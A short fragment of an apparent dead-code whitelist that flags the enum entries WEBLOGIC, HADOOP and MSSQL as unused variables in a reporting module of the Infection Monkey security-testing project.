|
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
||||||
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
|
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
|
||||||
MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44)
|
MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44)
|
||||||
|
|